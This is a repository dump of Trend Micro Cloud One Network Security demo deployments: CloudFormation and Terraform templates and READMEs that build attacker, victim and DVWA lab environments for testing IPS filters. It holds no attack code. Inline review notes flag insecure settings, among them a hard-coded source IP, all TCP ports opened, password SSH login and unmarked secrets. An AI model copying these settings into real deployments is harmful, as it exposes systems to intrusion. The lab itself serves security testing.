├── CODEOWNERS ├── east-west-deployment ├── docs │ └── east-west.png ├── README.md └── templates │ ├── BaseSite.yaml │ ├── dvwa.yaml │ └── Master.yaml ├── edge-deployment ├── docs │ ├── edge_deployment.png │ └── edge_deployment.drawio ├── templates │ ├── elasticache.template │ ├── dvwa.template │ ├── rdsaurora.template │ └── securitygroups.template └── README.md ├── demo_terraform ├── docs │ └── Azure_Terraform_Demo.png ├── README.md ├── azure-user-data.sh ├── provider.tf ├── variables.tf ├── outputs.tf ├── webserver.tf └── network.tf ├── centralized-with-gwlb ├── docs │ └── centralized-with-gwlb.png ├── templates │ ├── AddALB.yaml │ ├── RemoveRecord.yaml │ ├── dvwa.yaml │ ├── BaseSite.yaml │ ├── splunk.yaml │ ├── last.yaml │ └── Master.yaml └── README.md ├── .gitmodules ├── README.md ├── .gitignore └── LICENSE.txt /CODEOWNERS: -------------------------------------------------------------------------------- 1 | * @ahsankbhai 2 | -------------------------------------------------------------------------------- /east-west-deployment/docs/east-west.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trendmicro/cloudone-network-security-deployments/main/east-west-deployment/docs/east-west.png -------------------------------------------------------------------------------- /edge-deployment/docs/edge_deployment.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trendmicro/cloudone-network-security-deployments/main/edge-deployment/docs/edge_deployment.png -------------------------------------------------------------------------------- /demo_terraform/docs/Azure_Terraform_Demo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trendmicro/cloudone-network-security-deployments/main/demo_terraform/docs/Azure_Terraform_Demo.png 
-------------------------------------------------------------------------------- /centralized-with-gwlb/docs/centralized-with-gwlb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trendmicro/cloudone-network-security-deployments/main/centralized-with-gwlb/docs/centralized-with-gwlb.png -------------------------------------------------------------------------------- /demo_terraform/README.md: -------------------------------------------------------------------------------- 1 | # demo_terraform 2 | Terraform IaC for Azure NSVA deployment demo 3 | 4 | 5 | -------------------------------------------------------------------------------- /demo_terraform/azure-user-data.sh: -------------------------------------------------------------------------------- 1 | #! /bin/bash 2 | sudo apt-get update 3 | sudo apt-get install -y apache2 4 | sudo systemctl start apache2 5 | sudo systemctl enable apache2 6 | echo "

Demo Apache Web Server

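" | sudo tee /var/www/html/index.html -------------------------------------------------------------------------------- /demo_terraform/provider.tf: -------------------------------------------------------------------------------- 1 | # provider.tf 2 | 3 | terraform { 4 | required_providers { 5 | azurerm = { 6 | source = "hashicorp/azurerm" 7 | version = "=2.73.0" 8 | } 9 | } 10 | } 11 | 12 | # Azure Creds 13 | provider "azurerm" { /* NOTE(review): the service-principal secret arrives as a plain input variable (var.client_secret) and has to be typed in or placed in a tfvars file on every run. The azurerm provider also reads ARM_SUBSCRIPTION_ID, ARM_CLIENT_ID, ARM_CLIENT_SECRET and ARM_TENANT_ID from the environment, which keeps the secret out of files and shell history; on an Azure-hosted runner a managed identity avoids a long-lived secret altogether. */ 14 | features {} 15 | subscription_id = var.sub_id 16 | client_id = var.client_id 17 | client_secret = var.client_secret 18 | tenant_id = var.tenant_id 19 | } -------------------------------------------------------------------------------- /.gitmodules: -------------------------------------------------------------------------------- # NOTE(review): the git@github.com: URLs below need an SSH key registered with GitHub on the cloning machine; an anonymous "git clone --recursive" over HTTPS fails on them, whereas https://github.com/... URLs work for both. 1 | [submodule "edge-deployment/submodules/quickstart-aws-acm-certificate"] 2 | path = edge-deployment/submodules/quickstart-aws-acm-certificate 3 | url = git@github.com:aws-quickstart/quickstart-aws-acm-certificate.git 4 | [submodule "edge-deployment/submodules/quickstart-aws-vpc"] 5 | path = edge-deployment/submodules/quickstart-aws-vpc 6 | url = git@github.com:aws-quickstart/quickstart-aws-vpc.git 7 | [submodule "edge-deployment/submodules/quickstart-linux-bastion"] 8 | path = edge-deployment/submodules/quickstart-linux-bastion 9 | url = git@github.com:aws-quickstart/quickstart-linux-bastion.git 10 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Trend Micro Cloud One™ – Network Security Deployments 2 | 3 | This repository is intended for Network Security customers. It contains scripts and AWS CloudFormation and Azure Terraform templates for various deployment types that customers can leverage for PoC purposes. 4 | 5 | Below are the 4 deployments that this repository currently supports: 6 | 1. [Edge Deployment](edge-deployment/README.md) 7 | 2. 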
[Centralized Deployment with Gateway Load Balancer](centralized-with-gwlb/README.md) 8 | 3. [East West Deployment](east-west-deployment/README.md) 9 | 4. [Azure Terraform Demo Deployment](demo_terraform/README.md) 10 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Local .terraform directories 2 | **/.terraform/* 3 | 4 | # .tfstate files 5 | *.tfstate 6 | *.tfstate.* 7 | 8 | # Crash log files 9 | crash.log 10 | crash.*.log 11 | 12 | # Exclude all .tfvars files, which are likely to contain sensitive data, such as 13 | # password, private keys, and other secrets. These should not be part of version 14 | # control as they are data points which are potentially sensitive and subject 15 | # to change depending on the environment. 16 | *.tfvars 17 | *.tfvars.json 18 | 19 | # Ignore override files as they are usually used to override resources locally and so 20 | # are not checked in 21 | override.tf 22 | override.tf.json 23 | *_override.tf 24 | *_override.tf.json 25 | 26 | # Include override files you do wish to add to version control using negated pattern 27 | # !example_override.tf 28 | 29 | # Include tfplan files to ignore the plan output of command: terraform plan -out=tfplan 30 | # example: *tfplan* 31 | 32 | # Ignore CLI configuration files 33 | .terraformrc 34 | terraform.rc -------------------------------------------------------------------------------- /demo_terraform/variables.tf: -------------------------------------------------------------------------------- 1 | # variables.tf 2 | 3 | variable "prefix" { 4 | description = "Prefix for resources" 5 | default = "" 6 | } 7 | variable "location" { 8 | description = "Region to deploy resources" 9 | default = "" 10 | } 11 | 12 | /* variable "boot_diagnostics_sa_type" { 13 | description = "Storage account type for boot diagnostics" 14 | default = "Standard_LRS" 15 | } */ 16 | 17 | 
variable "demoenv" { 18 | description = "Demo Environment" 19 | default = "" 20 | } 21 | 22 | variable "sub_id" { 23 | description = "Subscription_ID" 24 | default = "" 25 | } 26 | 27 | variable "client_id" { 28 | description = "Client_ID" 29 | default = "" 30 | } 31 | 32 | variable "client_secret" { /* NOTE(review): holds a service-principal secret. With Terraform >= 0.14 add sensitive = true so the value is redacted from plan/apply output, and drop the empty default so a missing value is an error rather than a silent blank credential. */ 33 | description = "Client_Secret" 34 | default = "" 35 | } 36 | 37 | variable "tenant_id" { 38 | description = "Tenant_ID" 39 | default = "" 40 | } 41 | 42 | variable "admin_username" { 43 | description = "Admin Username Webserver" 44 | default = "" 45 | } 46 | 47 | variable "admin_password" { /* NOTE(review): local admin password for the VM in webserver.tf, where password authentication is left enabled; same treatment as client_secret (sensitive = true, no empty default). */ 48 | description = "Admin Password Webserver" 49 | default = "" 50 | } 51 | -------------------------------------------------------------------------------- /demo_terraform/outputs.tf: -------------------------------------------------------------------------------- 1 | # outputs.tf 2 | 3 | # Azure Resource Group 4 | output "Resource-Group" { 5 | value = azurerm_resource_group.demo-rg.name 6 | } 7 | 8 | # Azure inspection-vnet 9 | output "inspection-vnet-Name" { 10 | value = azurerm_virtual_network.inspection-vnet.name 11 | } 12 | output "inspection-vnet-Address" { 13 | value = azurerm_virtual_network.inspection-vnet.address_space 14 | } 15 | 16 | # Azure Management Subnet 17 | output "Subnet-Management" { 18 | value = azurerm_subnet.management-subnet.name 19 | } 20 | output "Subnet-Management-Address" { 21 | value = azurerm_subnet.management-subnet.address_prefixes 22 | } 23 | 24 | # Azure Inspection Subnet 25 | output "Subnet-inspection" { 26 | value = azurerm_subnet.inspection-subnet.name 27 | } 28 | output "Subnet-inspection-Address" { 29 | value = azurerm_subnet.inspection-subnet.address_prefixes 30 | } 31 | 32 | # Azure Sanitized Subnet 33 | output "Subnet-Sanitized-Name" { 34 | value = azurerm_subnet.sanitized-subnet.name 35 | } 36 | output "Subnet-Sanitized-Address" { 37 | value = azurerm_subnet.sanitized-subnet.address_prefixes 38 | } 39 | 40 | # Azure Load Balancer 
Subnet 41 | output "Subnet-loadbalancer-Name" { 42 | value = azurerm_subnet.loadbalancer-subnet.name 43 | } 44 | output "Subnet-loadbalancer-Address" { 45 | value = azurerm_subnet.loadbalancer-subnet.address_prefixes 46 | } 47 | 48 | # Azure Firewall 49 | output "Azure-Firewall" { 50 | value = azurerm_firewall.azure-firewall.name 51 | } 52 | output "Azure-Firewall-PIP" { 53 | value = azurerm_public_ip.azure-firewall-PublicIP.ip_address 54 | } 55 | 56 | # Log Analytics - Workspace ID and Primary Key 57 | output "Log-Analytics-Workspace-ID" { 58 | value = azurerm_log_analytics_workspace.log-analytics-workspace.workspace_id 59 | } 60 | output "Log-Analytics-Primary-Key" { 61 | value = azurerm_log_analytics_workspace.log-analytics-workspace.primary_shared_key 62 | sensitive = true 63 | } 64 | 65 | # Webserver IP Address 66 | output "Webserver-IP-Address" { 67 | value = azurerm_linux_virtual_machine.webserver.private_ip_address 68 | } 69 | 70 | # Storage Account ID 71 | output "Storage-Account-ID" { 72 | value = azurerm_storage_account.mystorageaccount.name 73 | } -------------------------------------------------------------------------------- /centralized-with-gwlb/templates/AddALB.yaml: -------------------------------------------------------------------------------- 1 | AWSTemplateFormatVersion: 2010-09-09 2 | 3 | Parameters: 4 | # ------------------------------------------------------------# 5 | # Import Master.yaml template 6 | # ------------------------------------------------------------# 7 | DomainName: 8 | Description: Enter the domain name to be used for the website 9 | Type: String 10 | SubDomain: 11 | Description: Enter the subdomain to be used for the ALB 12 | Type: String 13 | HostZoneID: 14 | Description: Enter the ID of the HostZone where the domain you want to use is registered 15 | Type: String 16 | # ------------------------------------------------------------# 17 | # Import BaseSite stack(BaseSite.yaml file) 18 | # 
------------------------------------------------------------# 19 | TargetGroupID: 20 | Description: Target group ID of ALB 21 | Type: String 22 | ALBID: 23 | Description: ID of ALB 24 | Type: String 25 | HostedZoneId: 26 | Description: Hosted Zone ID of ALB 27 | Type: String 28 | DNSName: 29 | Description: DNS Name of ALB 30 | Type: String 31 | 32 | Resources: 33 | # ------------------------------------------------------------# 34 | # resource to make your website HTTPS, Create HTTPS Listener, ACM and Route53 record 35 | # ------------------------------------------------------------# 36 | ALBListenerHTTPS: 37 | Type: AWS::ElasticLoadBalancingV2::Listener 38 | Properties: 39 | Port: 443 40 | Protocol: HTTPS 41 | Certificates: 42 | - CertificateArn: !Ref ACM 43 | DefaultActions: 44 | - TargetGroupArn: !Ref TargetGroupID 45 | Type: forward 46 | LoadBalancerArn: !Ref ALBID 47 | ACM: 48 | Type: AWS::CertificateManager::Certificate 49 | Properties: 50 | DomainName: !Sub ${SubDomain}.${DomainName} 51 | DomainValidationOptions: 52 | - DomainName: !Sub ${SubDomain}.${DomainName} 53 | HostedZoneId: !Ref HostZoneID 54 | ValidationMethod: DNS 55 | DnsRecord: 56 | Type: AWS::Route53::RecordSet 57 | Properties: 58 | HostedZoneId: !Ref HostZoneID 59 | Comment: DNS for ALB 60 | Name: !Sub ${SubDomain}.${DomainName} 61 | Type: A 62 | AliasTarget: 63 | HostedZoneId: !Ref HostedZoneId 64 | DNSName: !Ref DNSName 65 | 66 | Outputs: 67 | HTTPSWebSiteURL: 68 | Value: !Sub https://${SubDomain}.${DomainName} 69 | Description: URL to access the web server (HTTPS) -------------------------------------------------------------------------------- /east-west-deployment/README.md: -------------------------------------------------------------------------------- 1 | # east-west-deployment 2 | ## Purpose and Objectives 3 | 4 | This Quick Start deploys attacker, victim and security VPC to demonstrate outbound protection with Network Security Appliance. 
It also deploys Damn Vulnerable Web Application (DVWA) in one of the public subnets of the victim VPC. The purpose of this Quick Start is to provide users with a sample environment where they can deploy the Network Security Virtual Appliance for east-west (lateral) traffic between various workload VPCs using Transit Gateway. In this deployment, we use Gateway Load Balancer and Transit Gateway to route traffic to the Network Security Appliance. 5 | 6 | After deploying this Quick Start, you will be able to: 7 | 8 | - Deploy Network Security Virtual Appliance (NSVA) as [East-West Outbound Protection](https://cloudone.trendmicro.com/docs/network-security/GWLB_CFdeploy2/) 9 | - Configure your security profile in the Network Security console by distributing various Intrusion Prevention (IPS) and Geo filters to protect your resources from outbound attacks. 10 | - Perform various inbound and outbound attacks to validate protection. 11 | - Access logs of the Network Security Virtual Appliance (NSVA) to verify which filters are being triggered. 12 | ## Network Architecture 13 | 14 | 15 | 16 | ## Deployment Steps 17 | 18 | *Note: You can deploy this Quick Start using the default S3 template link below if you don't wish to modify this code and deploy your own customized version:* 19 | 20 | `https://quickstart-network-security.s3.us-west-1.amazonaws.com/east-west-deployment/templates/Master.yaml` 21 | ### 1. Deploy Network Security East West Outbound Only Inspection 22 | The Quick Start deploys a Security VPC for East West Outbound Only inspection in multiple AZs using Transit Gateways. 
Users are expected to deploy attacker and victim VPCs manually (instructions are given below) 23 | 24 | Following are pre-requisites that must be fulfilled before you could deploy the Quick Start: 25 | - Create a new SSH key pair in the AWS region you will be deploying the Quick Start 26 | - [Generate a CloudOne API Key](https://cloudone.trendmicro.com/docs/network-security/add_cloud_accounts_appliances/#generate-an-api-key) 27 | 28 | Below are the parameters for Quick Start: 29 | #### Quick Start Parameters 30 | ##### Required parameters 31 | | Parameter label (name) | Default | Description | 32 | | :----------------------| :------------- | :------------------------------------------------------------- | 33 | | AllowIP | 127.0.0.1/32 | Only the IP entered here will be able to access the web server | 34 | | BucketName | quickstart-network-security | Name of the bucket where the template is placed | 35 | | BucketPrefix | centralized-with-gwlb/ | Bucket prefix | 36 | | BucketRegion | us-west-1| Bucket region | 37 | | DVWAInstanceType | t3.micro | Amazon EC2 instance type for the DVWA instances | 38 | | sshKeyPairName | None| [Required: 'DeployC1NS' must be set to true] SSH Key of the EC2 you are using | 39 | | SSMAccess | true | If enabled, SSM access to the instance will be available | 40 | | DeployC1NS | true | If enabled, C1NS with be deployed in centralized Security VPC | 41 | 42 | ##### If you set the DeployC1NS parameter to true, the following parameters are required 43 | | Parameter label (name) | Default | Description | 44 | | :----------------------| :------------- | :------------------------------------------------------------- | 45 | | CloudOneAPIKEY | None | CloudOne API key you want to use | 46 | | InstanceType | c5n.2xlarge | Instance type of NSVA | 47 | | SecurityVPCCIDR | 10.10.10.0/16 | CIDR of the VPC where you want to deploy the NSVA | 48 | | NsvaCountPerAz | 1 | Number of NSVA instances to be deployed in the AZ | 49 | | EnableInspectionLogs | 
false | If enabled, NSVA Inspection Logs will be published to CloudWatch log group "network_security_logs" | -------------------------------------------------------------------------------- /east-west-deployment/templates/BaseSite.yaml: -------------------------------------------------------------------------------- 1 | AWSTemplateFormatVersion: 2010-09-09 2 | 3 | Parameters: 4 | # ------------------------------------------------------------# 5 | # Import Master.yaml template 6 | # ------------------------------------------------------------# 7 | ImageId: 8 | Description: Enter the AMI ID of the EC2 instance. 9 | Type: String 10 | AllowIP: 11 | Description: Enter the global IP of the terminal to be tested 12 | Type: String # NOTE(review): AllowIP is declared but no resource in this template references it; the web server security group is built from WebServerIngressAllowCIDR instead. Either wire it in or drop it, otherwise a caller may believe this value restricts access when it does nothing. 13 | NeedSSMAccess: 14 | Description: If enabled, SSM access to the instance will be available 15 | Type: String 16 | AllowedValues: [true, false] 17 | # ------------------------------------------------------------# 18 | # Import BaseVPC stack(aws-vpc.template.yaml file) 19 | # ------------------------------------------------------------# 20 | VPCId: 21 | Description: Enter the VPC ID where you want to deploy the EC2 instance. 22 | Type: String 23 | PrivateSubnet1ID: 24 | Description: Enter the Private Subnet ID where you want to deploy the EC2 instance. 
25 | Type: String 26 | WebServerIngressAllowCIDR: 27 | Description: CIDR from where webserver should be accessible 28 | Type: String 29 | 30 | # ------------------------------------------------------------# 31 | # Conditions 32 | # ------------------------------------------------------------# 33 | Conditions: 34 | NeedSSM: 35 | !Equals [true, !Ref NeedSSMAccess] 36 | 37 | Resources: 38 | # ------------------------------------------------------------# 39 | # Resources for when you need SSM Access, Create IAM Role and Instance Profile 40 | # ------------------------------------------------------------# 41 | EC2Role: 42 | Condition: NeedSSM 43 | Type: AWS::IAM::Role 44 | Properties: 45 | Path: / 46 | RoleName: !Sub ${AWS::StackName}-EC2Role 47 | AssumeRolePolicyDocument: 48 | Version: 2012-10-17 49 | Statement: 50 | - Effect: Allow 51 | Principal: 52 | Service: 53 | - ec2.amazonaws.com 54 | Action: 55 | - sts:AssumeRole 56 | MaxSessionDuration: 3600 57 | ManagedPolicyArns: 58 | - arn:aws:iam::aws:policy/service-role/AmazonEC2RoleforSSM # NOTE(review): AmazonEC2RoleforSSM is the legacy, broader SSM policy (it also carries S3 and CloudWatch permissions the web server does not need); AmazonSSMManagedInstanceCore grants only what the SSM agent and Session Manager require. 59 | 60 | InstanceProfile: 61 | Condition: NeedSSM 62 | Type: AWS::IAM::InstanceProfile 63 | Properties: 64 | Path: / 65 | Roles: 66 | - !Ref EC2Role 67 | 68 | # ------------------------------------------------------------# 69 | # Create EC2 Instance 70 | # ------------------------------------------------------------# 71 | EC2Instance: 72 | Type: AWS::EC2::Instance 73 | Properties: 74 | ImageId: !Ref ImageId 75 | InstanceType: t2.micro 76 | SecurityGroupIds: 77 | - !Ref EC2SecurityGroup 78 | IamInstanceProfile: !If 79 | - NeedSSM 80 | - !Ref InstanceProfile 81 | - !Ref AWS::NoValue 82 | SubnetId: !Ref PrivateSubnet1ID # NOTE(review): no KeyName is set, so with NeedSSMAccess=false the instance has no interactive access path at all; presumably intended for a target-only web server — confirm. 83 | Tags: 84 | - Key: Name 85 | Value: !Sub ${AWS::StackName}-WebServer 86 | UserData: 87 | !Base64 | 88 | #!/bin/bash 89 | amazon-linux-extras install nginx1.12 -y 90 | systemctl start nginx 91 | systemctl enable nginx 92 | # NOTE(review): amazon-linux-extras only exists on Amazon Linux 2, so ImageId is assumed to be an AL2 AMI, and the nginx1.12 topic is an old release line — TODO confirm both are still what the demo wants. 93 | # ------------------------------------------------------------# 94 | # Create Security 
Group for EC2 Instance 95 | # ------------------------------------------------------------# 96 | EC2SecurityGroup: 97 | Type: AWS::EC2::SecurityGroup 98 | Properties: 99 | GroupName: !Sub ${AWS::StackName}-EC2-SG 100 | GroupDescription: Used for Web Server 101 | VpcId: !Ref VPCId 102 | SecurityGroupIngress: 103 | - 104 | IpProtocol: tcp 105 | FromPort: 80 106 | ToPort: 80 107 | CidrIp: !Ref WebServerIngressAllowCIDR 108 | Tags: 109 | - Key: Name 110 | Value: !Sub ${AWS::StackName}-EC2-SG 111 | 112 | Outputs: 113 | WebServerIP: 114 | Description: Webserver IP 115 | Value: !GetAtt EC2Instance.PrivateIp 116 | InstanceProfile: 117 | Condition: NeedSSM 118 | Value: !Ref InstanceProfile 119 | Description: Instance profile to be used for SSM access -------------------------------------------------------------------------------- /demo_terraform/webserver.tf: -------------------------------------------------------------------------------- 1 | # webserver.tf 2 | 3 | # Create public IP 4 | /* resource "azurerm_public_ip" "pubip" { 5 | name = "myPublicIP" 6 | location = var.location 7 | resource_group_name = azurerm_resource_group.demo-rg.name 8 | allocation_method = "Static" 9 | } */ 10 | 11 | resource "azurerm_network_interface" "webserver-nic" { 12 | name = "webserver-nic" 13 | location = var.location 14 | resource_group_name = azurerm_resource_group.demo-rg.name 15 | 16 | ip_configuration { 17 | name = "vm-ip-config" 18 | subnet_id = azurerm_subnet.workload-subnet.id 19 | private_ip_address_allocation = "Dynamic" 20 | } 21 | 22 | tags = { 23 | environment = var.demoenv 24 | } 25 | } 26 | 27 | /* resource "azurerm_marketplace_agreement" "apacheplan-1" { 28 | publisher = "cognosys" 29 | offer = "apache-web-server-with-centos-77-free" 30 | plan = "hourly" 31 | } */ 32 | 33 | # Create Web Server 34 | resource "azurerm_linux_virtual_machine" "webserver" { 35 | name = "webserver" 36 | location = var.location 37 | resource_group_name = azurerm_resource_group.demo-rg.name 38 | 
network_interface_ids = [azurerm_network_interface.webserver-nic.id] 39 | disable_password_authentication = false /* NOTE(review): password SSH login stays enabled and the password comes from var.admin_password; the NSG below only narrows the source address, not the authentication method. For a demo reachable from the internet prefer an admin_ssh_key block with disable_password_authentication = true. */ 40 | size = "Standard_D2s_v4" 41 | admin_username = var.admin_username 42 | admin_password = var.admin_password 43 | /* user_data = <Demo Apache Web Server" | sudo tee /var/www/html/index.html 50 | EOF */ 51 | 52 | plan { 53 | publisher = "cognosys" 54 | product = "apache-web-server-with-centos-77-free" 55 | name = "apache-web-server-with-centos-77-free" 56 | } 57 | 58 | provisioner "local-exec" { /* NOTE(review): runs the Azure CLI on the machine executing terraform, so it needs its own logged-in az session; the provider's service-principal variables are not used by it. */ 59 | command = "az vm image terms accept --urn cognosys:apache-web-server-with-centos-77-free:apache-web-server-with-centos-77-free:1.2019.1009" 60 | } 61 | 62 | # Run this command in the Subscription that the Webserver will be deployed from the Azure Cloud Shell 63 | # az vm image terms accept --urn cognosys:apache-web-server-with-centos-77-free:apache-web-server-with-centos-77-free:1.2019.1009 64 | 65 | source_image_reference { 66 | /* publisher = "Canonical" 67 | offer = "UbuntuServer" 68 | sku = "18.04-LTS" 69 | version = "latest" */ 70 | publisher = "cognosys" 71 | offer = "apache-web-server-with-centos-77-free" 72 | sku = "apache-web-server-with-centos-77-free" 73 | version = "1.2019.1009" /* NOTE(review): a fixed 2019 build of a CentOS 7.7 marketplace image, so it will not carry later OS or Apache patches; fine for a disposable demo target, not for anything longer-lived. */ 74 | } 75 | 76 | os_disk { 77 | name = "webserver-osdisk" 78 | caching = "ReadWrite" 79 | storage_account_type = "Standard_LRS" 80 | } 81 | 82 | /* # Copies the azure-user-data.sh file to /var/tmp/ 83 | provisioner "file" { 84 | source = "./azure-user-data.sh" 85 | destination = "/var/tmp/" 86 | } */ 87 | 88 | tags = { 89 | environment = var.demoenv 90 | } 91 | } 92 | 93 | # Create Network security group 94 | resource "azurerm_network_security_group" "vm-sg" { 95 | name = "${var.prefix}-sg" 96 | location = var.location 97 | resource_group_name = azurerm_resource_group.demo-rg.name 98 | 99 | security_rule { 100 | name = "All" 101 | priority = 100 102 | direction = "Inbound" 103 | access = "Allow" 104 | protocol = "Tcp" 105 | source_port_range = "*" 106 | 
destination_port_range = "*" 107 | source_address_prefix = "70.121.85.105/32" /* NOTE(review): a hard-coded operator IP checked into source; anyone else running this demo gets a rule that admits someone else's address and locks themselves out. Promote it to an input variable with no default. The rule also opens every TCP port (destination_port_range = "*") from that address, not only the web port. */ 108 | destination_address_prefix = "*" 109 | } 110 | } 111 | 112 | # Connect the security group to the network interface 113 | resource "azurerm_network_interface_security_group_association" "vm1_nsg_assoc" { 114 | network_interface_id = azurerm_network_interface.webserver-nic.id 115 | network_security_group_id = azurerm_network_security_group.vm-sg.id 116 | } 117 | 118 | # Generate random text for a unique storage account name 119 | # NOTE(review): random_id comes from the hashicorp/random provider, which provider.tf does not list in required_providers, so its version is unpinned; declare it there next to azurerm. 120 | resource "random_id" "randomId" { 120 | keepers = { 121 | # Regenerated only when the prefix-derived NSG name changes (the key is called resource_group but holds "${var.prefix}-sg", not a resource group) 122 | resource_group = "${var.prefix}-sg" 123 | } 124 | 125 | byte_length = 8 126 | } 127 | 128 | # Create storage account for boot diagnostics 129 | resource "azurerm_storage_account" "mystorageaccount" { /* NOTE(review): min_tls_version is not set, so the provider default applies; set min_tls_version = "TLS1_2" explicitly even for a diagnostics-only account. */ 130 | name = "diag${random_id.randomId.hex}" 131 | resource_group_name = azurerm_resource_group.demo-rg.name 132 | location = var.location 133 | account_tier = "Standard" 134 | account_replication_type = "LRS" 135 | 136 | tags = { 137 | environment = var.demoenv 138 | } 139 | } -------------------------------------------------------------------------------- /centralized-with-gwlb/templates/RemoveRecord.yaml: -------------------------------------------------------------------------------- 1 | AWSTemplateFormatVersion: 2010-09-09 2 | 3 | Parameters: 4 | # ------------------------------------------------------------# 5 | # Import Master.yaml template 6 | # ------------------------------------------------------------# 7 | HostZoneID: 8 | Description: Enter the ID of the HostZone where the domain you want to use is registered 9 | Type: String 10 | 11 | Resources: 12 | RemoveRecordLambdaRole: 13 | Type: AWS::IAM::Role 14 | Properties: 15 | Path: / 16 | RoleName: 17 | Fn::Join: 18 | - "" 19 | - - Fn::Select: 20 | - 2 21 | - Fn::Split: 22 | - "-" 23 | - !Ref AWS::StackName 24 | - "-RemoveRecordLambdaRole" # NOTE(review): the name is the third dash-separated segment of the stack name, so the stack must always have at least three such segments, and FunctionName further down selects the fourth — TODO confirm the naming contract with Master.yaml 25 | AssumeRolePolicyDocument: 26 | 
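Version: 2012-10-17 27 | Statement: 28 | - Effect: Allow 29 | Principal: 30 | Service: 31 | - lambda.amazonaws.com 32 | Action: 33 | - sts:AssumeRole 34 | MaxSessionDuration: 3600 35 | ManagedPolicyArns: 36 | - arn:aws:iam::aws:policy/service-role/AWSLambdaBasicExecutionRole 37 | - !Ref RemoveRecordLambdaPolicy 38 | 39 | RemoveRecordLambdaPolicy: 40 | Type: "AWS::IAM::ManagedPolicy" 41 | Properties: 42 | ManagedPolicyName: 43 | Fn::Join: 44 | - "" 45 | - - Fn::Select: 46 | - 2 47 | - Fn::Split: 48 | - "-" 49 | - !Ref AWS::StackName 50 | - "-RemoveRecordLambdaPolicy" 51 | Path: / 52 | PolicyDocument: 53 | Version: 2012-10-17 54 | Statement: 55 | - Action: 56 | - route53:ChangeResourceRecordSets 57 | - route53:ListResourceRecordSets 58 | Resource: !Sub arn:aws:route53:::hostedzone/${HostZoneID} # scoped to the single zone the handler reads from its HostedZoneId environment variable instead of every zone in the account; assumes HostZoneID is the bare zone ID (Z...) and not the /hostedzone/ form — TODO confirm 59 | Effect: Allow 60 | 61 | RemoveRecordLambdaFunction: 62 | Type: AWS::Lambda::Function 63 | Properties: 64 | Code: 65 | ZipFile: | 66 | import json, boto3, logging 67 | import cfnresponse 68 | import os 69 | from datetime import datetime 70 | logger = logging.getLogger() 71 | logger.setLevel(logging.INFO) 72 | 73 | HostedZoneId = os.environ.get('HostedZoneId') 74 | client = boto3.client('route53') 75 | 76 | def lambda_handler(event, context): 77 | logger.info("event: {}".format(event)) 78 | try: 79 | if event['RequestType'] == 'Delete': 80 | response = client.list_resource_record_sets( 81 | HostedZoneId=HostedZoneId, 82 | ) # NOTE(review): only the first page is read (IsTruncated / NextRecordName are never checked), so CNAMEs beyond it survive the Delete; and the loop below removes every CNAME in the zone, not only records this stack caused to exist (presumably the ACM DNS-validation CNAMEs from AddALB.yaml), which is destructive in a shared zone — narrow the match by name or value before relying on this. 83 | for i in range(len(response['ResourceRecordSets'])): 84 | if "CNAME" == response['ResourceRecordSets'][i]['Type']: 85 | name = response['ResourceRecordSets'][i]['Name'] 86 | ttl = response['ResourceRecordSets'][i]['TTL'] 87 | value = response['ResourceRecordSets'][i]['ResourceRecords'][0]['Value'] 88 | client.change_resource_record_sets( 89 | HostedZoneId=HostedZoneId, 90 | ChangeBatch={ 91 | 'Changes': [ 92 | { 93 | 'Action': 'DELETE', 94 | 'ResourceRecordSet': { 95 | 'Name': name, 96 | 'Type': 'CNAME', 97 | 'TTL' : ttl, 98 | 'ResourceRecords': [ 99 | { 100 | 'Value': value 101 | }, 102 | ] 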
103 | } 104 | } 105 | ] 106 | } 107 | ) 108 | sendResponseCfn(event, context, cfnresponse.SUCCESS) 109 | except Exception as e: 110 | logger.info("Exception: {}".format(e)) 111 | sendResponseCfn(event, context, cfnresponse.FAILED) # NOTE(review): reporting FAILED on a Delete event makes the stack deletion itself fail; decide whether a record clean-up error should block deletion or be logged and reported as SUCCESS. 112 | 113 | def sendResponseCfn(event, context, responseStatus): 114 | responseData = {} 115 | responseData['Data'] = {} 116 | cfnresponse.send(event, context, responseStatus, responseData, "CustomResourcePhysicalID") 117 | Role: !GetAtt RemoveRecordLambdaRole.Arn 118 | Environment: 119 | Variables: 120 | HostedZoneId: !Ref HostZoneID 121 | FunctionName: 122 | Fn::Join: 123 | - "" 124 | - - Fn::Select: 125 | - 3 # NOTE(review): selects the fourth dash-separated segment of the stack name while RoleName and ManagedPolicyName above select the third (index 2) — TODO confirm which is intended 126 | - Fn::Split: 127 | - "-" 128 | - !Ref AWS::StackName 129 | - "-RemoveRecord-Function" 130 | Handler: index.lambda_handler 131 | MemorySize: 128 132 | Runtime: python3.7 # NOTE(review): Lambda has deprecated the python3.7 runtime and no longer allows new functions on it, so this template will fail to create until the runtime is moved to a supported python3.x release. 133 | Timeout: 300 134 | 135 | RemoveRecord: 136 | Type: AWS::CloudFormation::CustomResource 137 | Properties: 138 | ServiceToken: !GetAtt RemoveRecordLambdaFunction.Arn -------------------------------------------------------------------------------- /edge-deployment/templates/elasticache.template: -------------------------------------------------------------------------------- 1 | { 2 | "AWSTemplateFormatVersion": "2010-09-09", 3 | "Description": "WordPress ElastiCache - Memcached Cluster. 
(qs-1op312ie1)", 4 | "Parameters": { 5 | "Subnets": { 6 | "ConstraintDescription": "Must be a list of existing subnet Ids", 7 | "Description": "Atleast two existing Subnets in separate Availability Zones in your Virtual Private Cloud (VPC)", 8 | "Type": "List" 9 | }, 10 | "ElastiCacheSecurityGroup": { 11 | "Description": "A list of VPC security group IDs to be attached to the nodes in the cache cluster.", 12 | "Type": "List" 13 | }, 14 | "AutoMinorVersionUpgrade":{ 15 | "AllowedValues": [ 16 | "true", 17 | "false" 18 | ], 19 | "Default": "true", 20 | "Description": "Select true/false to setup Auto Minor Version upgrade", 21 | "Type": "String" 22 | }, 23 | "NodeType": { 24 | "AllowedValues": [ 25 | "cache.t2.micro", 26 | "cache.t2.small", 27 | "cache.t2.medium", 28 | "cache.t3.micro", 29 | "cache.t3.small", 30 | "cache.t3.medium", 31 | "cache.m3.medium", 32 | "cache.m3.large", 33 | "cache.m3.xlarge", 34 | "cache.m3.2xlarge", 35 | "cache.m4.large", 36 | "cache.m4.xlarge", 37 | "cache.m4.2xlarge", 38 | "cache.m4.4xlarge", 39 | "cache.m4.10xlarge", 40 | "cache.m5.large", 41 | 